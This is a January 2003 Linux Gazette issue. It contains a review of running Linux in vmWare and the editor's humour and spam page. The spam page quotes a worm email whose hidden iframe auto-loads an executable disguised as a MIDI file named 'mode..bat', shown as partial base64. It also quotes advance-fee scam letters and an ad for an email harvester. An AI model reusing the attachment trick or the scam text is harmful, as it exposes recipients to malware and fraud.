vmWare is a virtual machine. That is to say, it emulates an Intel-based PC in much the same way there are emulators for Motorola-based machines out there. Though the fact that it is emulating an Intel-based platform while running on ... an Intel- based platform (!) means that vmWare can in fact pass many instructions straight to the CPU for execution with no intermediate translation, thus speeding up the process somewhat. This is a bit different from a Java virtual machine, for instance, where the emulator gets to translate Java byte-codes to Intel instructions before getting them executed.

Yes, it is a commercial program; i.e. you should pay for it, though you do get to evaluate for free. Now, before going into the details, allow me to state my position on commercial programs: I am not against commercial programs. I have used several commercial programs that were in fact pretty good, and well worth the money invested. However, I do prefer open-source software, not for the ecomical aspect but because that if - or rather when - something goes wrong or is not quite what I need, I can fix it myself instead of depending on a corporation to do it at their leasure. I have nothing against vmWare, on the contrary ... but for the above reason I would much prefer to be reviewing an open source version of the same type of program.

Why use vmWare?

1/. One good reason to use it is when you really must. For example, I use a laptop at work that is shared between several people (not yet Linux users), and that for mainly administrative reasons:

• must run Windows 2000
• cannot be repartitioned as a dual-boot

On the other hand, I teach a course on web site creation and administration with Apache and PHP, for which it is expedient to use a laptop running Linux and X Windows.

2/. vmWare sets up a virtual machine that you can configure according to your needs - not according to the real hardware on your computer. For example, it sets up by default a 4 GByte file on the hard drive to emulate the drive on the virtual machine. To the virtual machine, this file looks like a SCSI drive, when it is in fact just a file on the IDE drive. Also by default, it uses an IDE CD drive just like ... an IDE CD drive. Though you can tell it to use it as a SCSI drive, or set up an ISO CD-ROM image as a drive with the CD inside it (e.g. for installation). You get to use hardware you don't actually have, such as tape drives. Good for experimentation.

3/. You can also have several virtual machines running at the same time, and set up a local network on your computer with different operating systems. This is good either to

• try out a new OS without repartitionning (wiping it back out is just a click away :-)
• see how the new OS integrates your existing network before having to format a (sometimes unavaiblable) computer
• show people how multiple OS integrate with a single LCD projector

4/. If you really need a program that does not run on the main operating system, you get it in a window.

Rather interestingly, this used to be a problem for Linux users that needed programs available only under Windows (usually commercial). Word processors and spreadsheets were a bit of a problem before StarOffice and OpenOffice became commonplace. Right now, I find I often have this problem in reverse: I get interesting programs for Linux that are available only with difficulties for Windows, or not any recent versions. Some examples are mathematical plotting tools such as gnuplot and scilab, or just user programs I prefer like Evolution.

Why not use vmWare?

1/. Speed. After all, we are sharing a single CPU between two or more operating systems. Though this problem is mitigated if we run user-land programs on just one system at a time. By the way, it would be nice on a SMP system to have vmWare dedicate one CPU to each virtual machine ... though probably impossible to have without redesigning the host operating system's kernel completely.

2/. Speed once again. You do need plenty of physical RAM to run at a reasonable speed. Try to have at least 128 MByte per operating system, or be prepared for intensive swapping. This may be a problem on a laptop, either way (remember that a laptop's hard disk is not built for intensive use). Try not to use the virtual machines' swap systems.

3/. Speed, third time 'round. All peripherics (drives, network cards) are shared between virtual machines. For example, on a machine with two virtual machines running and with much luck, each system gets a fair share (one third - remember the host system!) of the bandwidth. Actual results can be much lower, depending mainly on the host operating system's design and efficiency.

Installing vmWare

Using vmWare is rather easy. I got to install only the Windows version (because of bandwith problems for downloading), and as noted above it is the version I needed the most. However, it may make more sense to use the more stable OS as host; i.e. run Windows in a virtual machine on a Linux host computer instead of the opposite as I was forced to do.

Installing Linux in a virtual machine is as easy as:

• creating a new virtual machine with the desired characteristics
• inserting the Linux bootable CD in the drive (or you could set up it's ISO image as a virtual CD drive)
• powering up the virtual machine

I installed both SuSE 8.1 and Mandrake 8.2 with no problems in this way, though the virtual machine insisted on an IDE CD drive for booting. I was able to switch to a SCSI drive once the system was installed, though.

The virtual machine has access to the network through a proprietary vmWare bridging protocol - but only if your network card has been enabled on the host system. It can either use a static IP address or get a dynamic address from your network DHCP server.

You can then connect to a server running on the virtual machine from the virtual machine itself, from other computers on your network, or even from the host computer through the virtual machine's external network address.

Note that vmWare assigns to both the host system and virtual machines addresses on subnetworks 192.168.19.0/24 and 192.168.199.0/24 for its bridging protocol - you cannot use these for your connections.

There may be more straightforward ways of passing files from one system to another, but the easiest I found was to set up a Samba server on the virtual Linux machine. It works well enough, and is logically faster than a 100 Mbaud link, but may not be a good idea in a production environment.

The end result of all this is that I find vmWare a fascinating concept - with its drawbacks, true enough. It can be useful in a development environment, either for programming or for systems administration. But it should be avoided for production: if you really need two operating systems, you may be better off buying two computers!

PS. Should anybody want to translate this article: I wrote it in the spirit of the GPL software licence. i.e. you are free (and indeed encouraged) to copy, post and translate it -- but please, PLEASE, send me notice by email! I like to keep track of translations -- it's good for the curriculum :-)

 

Alan teaches CS in Andorra at high-school and university levels. His hobbies include science photography (both digital and traditional), trekking, rock and processor collecting.

---

Copyright © 2003, Alan Ward. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

The Back Page

• Greetings from Iron
• Wacko Topic of the Month
• Not The Answer Gang
• World of Spam

---

Greetings from Iron

---

Look ma, I got a greetings column just like Heather now!

Only two changes to LG's format this month:

1. The author bios are the bottom of the articles again. Raj Shekhar requested this, so he can print the articles and read them off-line while still seeing the bios. As always, the lastest bio and contact info is on the author's Author page.
2. The yellow articles table on the Front Page and Site Map is smaller now (when viewed in a graphical browser). Now, if I could just make it smaller vertically....

SSC was closed Christmas week so I had a wonderful five days off. I finished a long-awaited project, updating the Cheetah Users' Guide.

Then I started putting together a computer for my mom. Right now she's got Windows 95 on a 486. I gave her the Linux in the Workplace book a month ago so that the transition to Linux won't be a total shock. The book goes over the KDE user interface step by step with lots of screenshots. Then I had her open her Word documents on my computer so she could verify they opened properly and that the user interface was OK, before I commandeer her monitor and keyboard for the new computer. I had her try out AbiWord, KWord (part of the KOffice suite) and OpenOffice Writer. Both AbiWord and OpenOffice opened all the documents, but OpenOffice handled her headers/footers and tabs the best and had a slightly better user interface. KWord failed to open two of the documents, which had a .doc extension but were really RTF (Rich Text Format). She doesn't know how they got that way. So I used "Save As..." in OpenOffice to convert them back to Word format.

Rather than installing Debian from scratch and remembering all my customizations, I decided to clone my existing partitions and delete what she won't use. That went well enough, although again I had to use "linear" in /etc/lilo.conf instead of "lba32". That's the third drive it's happened with, which confirms that it's my BIOS' fault, not the drives'. We'll see what the new motherboard does when I connect it up.

I did have trouble making a boot floppy. First, I couldn't find my Debian rescue disk. Then I found a disk that booted my current system. It contained just a kernel, no LILO. I could use rdev to change the root device, but I didn't want to sabotage my only boot floppy, so I tried to make another boot floppy. But every time I copied the kernel to a disk and booted from it, it would hang after the "Uncompressing Linux..." message, saying something like, "unexpected end of compressed data: system halted". One disk gave an I/O error so I threw it out, but it wouldn't work on two other disks either. I tried both cp'ing and dd'ing the kernel, but neither way worked. Then I realized I could set up LILO for my new system from my old system, so I did that instead. The first time I got the "L 99 99 99" error, but the second time it worked.

Friday my DSL went down, and I spent four days calling Qwest and The River (my ISP) to do something about it. Actually, it's not "down" but there's 99% packet loss, which is essentially the same thing. It would come up every several hours just long enough for a bit of e-mail to slip in and out, and then go down again. The ISP and Qwest wouldn't support Linux so I had to plug in my roommate's Windows XP box so they could troubleshoot it. We checked the IP configuration multiple times and reconfigured the DSL modem (which involves plugging in a serial "management cable" and running Minicom/Kermit/HyperTerminal and typing commands to a router OS). I kept asking, "Can you see the ping packets going back and forth? Can you see the ATM packets?" They could (sometimes), but I wasn't getting replies. I decided to call them both once a day until somebody took responsibility for it, or I cancelled the service, whichever came first. Finally on Monday, Qwest admitted they were having severe hardware problems in the DSLAM (that's the DSL connector in the central office), and that it had been going up and down for a week. Contradicting what the woman had told me Sunday, that there had been a DSLAM problem but they had fixed in at 10pm Saturday. It's doing a lot better today (Tuesday), but it's still not fixed.

Just for fun, here's a picture of me that LJ made for the December cover, then decided not to use. Here's how they would have gone together. (I can already see Ben Okopnik saying, "I knew it. I just knew it. You can't trust that Mike any farther than you can throw him....") It was Don Marti's idea, but then the Marketing department decided they couldn't have a picture of somebody smashing people with a hammer on the cover, even if they are lego people....

---

Wacko Topic of the Month

---

Thomas Adam got this from his local LUG. Ben Okopnik says it's a very old list, and he can't figure out which version of csh or Unix they apply to, certainly not to bsd-csh or tcsh under Linux.

The following extracts are typed into the Unix "Cshell":-

% ^How did the sex change^operation go?
Modifier failed.

% make love
Make: Don't know how to make love. Stop.

% man woman
No manual entry for woman.

% sleep with me
bad character

% got a light?
No match.

% man: why did you get a divorce?
man:: Too many arguments.

% scan for <<"Arnold Schwarzenegger"^J^D
"Arnold Schwarzenegger": << terminator not found

% ar m God
ar: God does not exist

% ^What is saccharine?
Bad substitute.

% %blow
%blow: No such job.

% cat 'the can of tuna'
cat: cannot open the can of tuna

$ mkdir matter; cat>matter
matter: cannot create

$ drink 

---

Here's another old Unix joke Walt R sent in. It's a bit late for Christmas, but at least now it's in LG for posterity.

Santa learns Unix(Author Unknown)

better !pout !cry
better watchout
lpr why
santa claus < north pole > town

cat /etc/passwd > list
ncheck list
ncheck list
cat list | grep naughty > nogiftlist
cat list | grep nice > giftlist
santa claus < north pole > town

who | grep sleeping
who | grep awake
who | grep bad || good
for (goodness sake) {be good}

echo "Oh,"
better !pout !cry
better watchout
lpr why
santa claus < north pole > town

---

Not The Answer Gang

---

when i start up my pc sometimes a window box comes up saying your system has performed an illegal operation and it reads:
spool32 caused invalid page in module spool32 exe at 0167:00402015
please help

Iron:

That's normal Windows behavior.

Thomas Adam:

My only guess is that you're using Linux (good man!) and that you've neglected to realise that you currently have the BSOD (Blue Screen Of Death) screensaver running. I know it is confusing, especially as you've probably only just made the crossover from Windows to Linux, but bear with us, the BSOD screensaver is only a joke!! You poor thing -- you don't have to be haunted anymore. YOU'RE FREE!!

---

my question is
1. The beginning of gangs?
2.their reason for joining a gang in those years?
3. In what state/country did gang first began?
please write as much as you can about this is for a report.

Iron:

(1) What is a gang? Is a group of close friends a gang? If not, what would they have to do to be a gang? Get a name? A clubhouse? A secret handshake? Choose a bandana color? Look menacing? Sell drugs and shoot people?

(2) I bet you can already answer this. If not, you can ask some gang members, or see any of the hundreds of studies and documentaries that focus on this question. Or take any pop movie (Colors, West Side Story, American History X, 8 Mile, A Clockwork Orange, Quadrophenia, etc) and ask, why did those people join gangs? What benefits do they get by being in them? What is their family life like? Is there something missing in their family life? Is there any connection between the two?

Quadrophenia has a lot to say about this. Why is Jimmy a mod? Why is he so excited about the demonstration in Brighton? Why is he so devastated when he goes to Brighton again and it's empty? How does his mom treat him? How does his dad treat him? When he tries to convince his girlfriend not to dump him, what are their differing views about the Brighton rumble?

(3) depends on how you answer (1).

---

what is meant by Tier 2/3 ISPs
send tme the details if u dont mind

Rick Moen:

the details r that u dont quite grasp what "linux-questions-only@ssc.com" means. thx. have a nice day. c ya.

---

World of Spam

---

The Register has an article on how Nigeria scam money can help pay off the US national debt!

---

<title>Wipe Out Junk Email!</title>
a.copy:link {font-family: verdana; font-size: 13px; color: black; text-deco= ration: none; }=0D
<span style=3D"font-family: verdana; font-size: 12px;">If you can not= see this please go to:=0D

<!--TRACKING IMAGE--><!--TRACKING IMAGE-->=0D <img src=3D"http://www.mailwiper.com/images/501.gif" width=3D"1" height=3D"= 1" alt=3D"" border=3D"0">=0D <!--TRACKING IMAGE--><!--TRACKING IMAGE--></td>

Tired of Deleting Junk Mail?
Are you fed up with a flood of unwanted offensive eMails? This is referred to as junk e-mail, Spam, unsolicited e-mail...Nasty eMails etc. The problem is it's disgusting and ugly, it's an invasion of your privacy, and it is definitely a huge waste of Your time.

Wipe Out Junk Mail Forever!
XXXXX works 100% of the time or your money back!

[Spam-killing software that's advertised in a highly decorated HTML spam? That really gives me a lot of confidence. Especially when the ad has a TRACKING IMAGE built into it. How do I know this software I'm buying won't have its own tracking utility built into it too? -Iron.]

---

I have visited your site and I think that design looks not good now. Here we are - XXXXX.com. Check it out! We have hired 2 new designers from Indonesia. They rocks!

---

Do not show ugly website to people! Make cool website. Let it start here - www.liquid2d.com . Website templates are here for your website. Use most advanced design concept from the best designers. Become the best amoung other websites. Use the best designers in the world.

---

SPAM: -------------------- Start SpamAssassin results ----------------------
SPAM: This mail is probably spam.  The original message has been altered
SPAM: so you can recognise or block similar unwanted mail in future.
SPAM: See http://spamassassin.org/tag/ for more details.
SPAM: 
SPAM: Content analysis details:   (25.60 hits, 5 required)
SPAM: INVALID_DATE_TZ_ABSURD (4.4 points)  Invalid Date: header (timezone does not exist)
SPAM: SUBJ_HAS_SPACES    (4.2 points)  Subject contains lots of white space
SPAM: INVALID_MSGID      (1.2 points)  Message-Id is not valid, according to RFC 2822
SPAM: BAD_CREDIT         (2.5 points)  BODY: Eliminate Bad Credit
SPAM: NO_OBLIGATION      (1.5 points)  BODY: There is no obligation.
SPAM: NO_FEE             (0.9 points)  BODY: No Fees
SPAM: MORTGAGE_OBFU      (0.7 points)  BODY: Attempt at obfuscating the word "mortgage"
SPAM: WHY_WAIT           (0.7 points)  BODY: What are you waiting for
SPAM: CLICK_BELOW        (0.3 points)  BODY: Asks you to click below
SPAM: SPAM_PHRASE_08_13  (-0.1 points) BODY: Spam phrases score is 08 to 13 (medium)
SPAM:                    [score: 8]
SPAM: HTML_70_90         (0.9 points)  BODY: Message is 70-90% HTML tags
SPAM: KNOWN_MAILING_LIST (-2.1 points) Email came from some known mailing list software
SPAM: DATE_IN_FUTURE_06_12 (1.7 points)  Date: is 6 to 12 hours after Received: date
SPAM: SUBJ_HAS_UNIQ_ID   (0.2 points)  Subject contains a unique ID
SPAM: RCVD_IN_DSBL       (3.2 points)  RBL: Received via a relay in list.dsbl.org
SPAM:                    [RBL check: found 50.148.244.195.list.dsbl.org]
SPAM: RCVD_IN_MULTIHOP_DSBL (0.8 points)  RBL: Received via a relay in multihop.dsbl.org
SPAM:                    [RBL check: found 2.16.57.200.multihop.dsbl.org]
SPAM: RCVD_IN_OSIRUSOFT_COM (0.4 points)  RBL: Received via a relay in relays.osirusoft.com
SPAM:                    [RBL check: found 50.148.244.195.relays.osirusoft.com.]
SPAM: RCVD_IN_UNCONFIRMED_DSBL (0.8 points)  RBL: Received via a relay in unconfirmed.dsbl.org
SPAM:                    [RBL check: found 2.16.57.200.unconfirmed.dsbl.org]
SPAM: X_OSIRU_OPEN_RELAY (2.7 points)  RBL: DNSBL: sender is Confirmed Open Relay
SPAM: CTYPE_JUST_HTML    (0.7 points)  HTML-only mail, with no text version
SPAM: 
SPAM: -------------------- End of SpamAssassin results ---------------------

---

Dear in christ,
Permit me to inform you of my desire of going into business relationship with you. I got your name and contact from the Ivoirian chamber of commerce and industry.

I prayed over it and selected your name among other names due to its esteeming nature and the recommendations given to me as a reputable and trust worthy person that I can do business with and by the recommendation , I must not hesitate to confide in you for this simple and sincere business . I am Miss PAULINE ATTAN the only daughter of late Mr.and Mrs. ATTAN . My father was a very wealthy cocoa merchant in Abidjan , the economic capital of Ivory coast, my father was poisoned to death by his business associates on one of their outings on a business trip .

My mother died when I was a baby and since then my father took me so special. Before the death of my father on November 2001 in a private hospital here in Abidjan he secretly called me on his bed side and told me that he has the sum of eighten million,five hundred thousand United State Dollars. USD ($18.500,000) left in one of the Security Companies in overseas.

---

[Note the use of quotes to confuse spamfilters. -Iron.]

From: A Millionaire <success@dailypromo.com>

You May Be closer (maybe hours away) To 'Financial' 'Freedom' than you think...

If you needed '$24,000' in 24 Hours And your life depended on it?. How would you do it? 'Click' 'Here'

---

U-harvest turns your PC to a powerful marketing machine. It scans, in a blinding speed, every word and every page of targeted, well defined list of websites, defined by your favorite search engine and harvests e-mail addresses.

U-harvest- business at the speed of thought.

---

I WANT TO ORDER 50 OF THIS BOOK [Linux Firewalls (2nd Edition)] FORM YOUR SHOP AND I WANT MY ORDER TO BE SHIPPED TO MY SHOP IN LAGOS NIERIA I WILL BE HAPPY IF YOU CAL.

---

I'd like to stay informed. Could you add my home account to our mailing list? It's XXXXX@hotmail.com Thanks for adding me to your mailing list. And, if you're every in the market for music industry contacts let me know.

---

Please note that after years, the registration on the domain name PhpInternational.Com was not renewed and this domain had become available to register. Consequently, we have been approached to market this domain name that has beentracked an PhpInternational.Com now available from us for IMMEDIATE transfer. With so many companies that could benefit from this domain, along with what many would consider to be a "wholesale price", we hope to secure a quick transfer.

Please note that the domain name market is extremely solid at the moment and similar domains are currently selling on afternic.com, greatdomains.com (domain auction sites) and by domain name brokers, in some cases, for many thousands of US dollars.

---

Do you hate those annoying, unwanted pop-up ads? Sure you do!! Everyone does!! Get rid of pop-up ads with the Pop-Up Defender Software!!

For only $19.95 you can regain control of your web browsing experience and eliminate unwanted pop-ups!! SAVE $20.00 off the regular price!!

---

Do you want to run your own dating or adult contact site for free ? Whether you are interested in making money or new friends/contacts, running your own dating site can be the best way to do it.

---

I am Madam Brenda Williams wife/widow to late Gen Patrick Williams an Army Officer, im also a mother of 3 lovely boys, Patrick (12yrs), Kevin (8yrs), Dotun which is a traditional name, he his 5 yrs, and im also the last wife out of 3, married to my late husband.

Before my husband died he willed all his landed property to his elder wives and children, all the elder wives and their children enjoyed what is left of our husbands wealth, leaving me the last wife with nothing, well we did not get along well when he was alive but he loved the kids i had for him.

Things are not going too well, after 1yr of his death, i mean raising the kids, sending them to school, clothing them even shelter and feeding, my parents are already dead, just me in this miserable world and i have just 2 months to evacuate the house im staying now, all the other wives dont allow me in their houses including the house i used to live with my husband before he died or even render any kind of help, but i really loved my husband.

Why i have contacted you is because my late husband left some money for his children (7 million US Dollars) deposited in a Security Company(www.XXXXX.net) abroad, which was revealed to me by the family lawyer just 6 months ago, which he claimed to be the time stated on the will by my late husband to avoid clashes between myself and the other wives.

But this money can only be claimed when each child is up to 21yrs in age, not even myself can extract from this fund according to the will. The other option is if i can provide someone(FORIEGNER) who will stand as a caretaker for my kids and my self, and help invest this money with profit in future.

---

Subject: Urgent for {%Address%}

---

Subject: Run in DOS mode.

--F5785stD5yBm2edp57QD583O07A3k2RY1
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=cid:J3d6lrE5 height=0 width=0>
</iframe>
<FONT></FONT></BODY></HTML>

--F5785stD5yBm2edp57QD583O07A3k2RY1
Content-Type: audio/x-midi;
	name=mode..bat
Content-Transfer-Encoding: base64
Content-ID: 

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
--F5785stD5yBm2edp57QD583O07A3k2RY1

--F5785stD5yBm2edp57QD583O07A3k2RY1
Content-Type: application/octet-stream;
	name=pcmcia_result.htm
Content-Transfer-Encoding: base64
Content-ID: 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAD0wSw9sKBCbrCgQm6woEJuWL9JbrGgQm4zvExuuaBCbtK/
UW63oEJusKBDbv2gQm5Yv0huqqBCbgimRG6xoEJuWL9GbrGgQm5SaWNosKBCbgAAAAAAAAAA
--F5785stD5yBm2edp57QD583O07A3k2RY1--

[Did you catch the names of those files? -Iron.]

---

Have you ever seen a fully automated popcorn vending machine that allows your customer to insert a coin or coins and receive a bag of freshly cooked popcorn within a minute, complete with buttery topping and a choice of delicious flavorings? Here is a unique opportunity to profit from healthy popcorn, the largest and the fastest growing segment of the snack food industry.

---

Happy Linuxing!

Mike ("Iron") Orr
Editor, Linux Gazette, gazette@ssc.com

 

---

Copyright © 2003, . Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---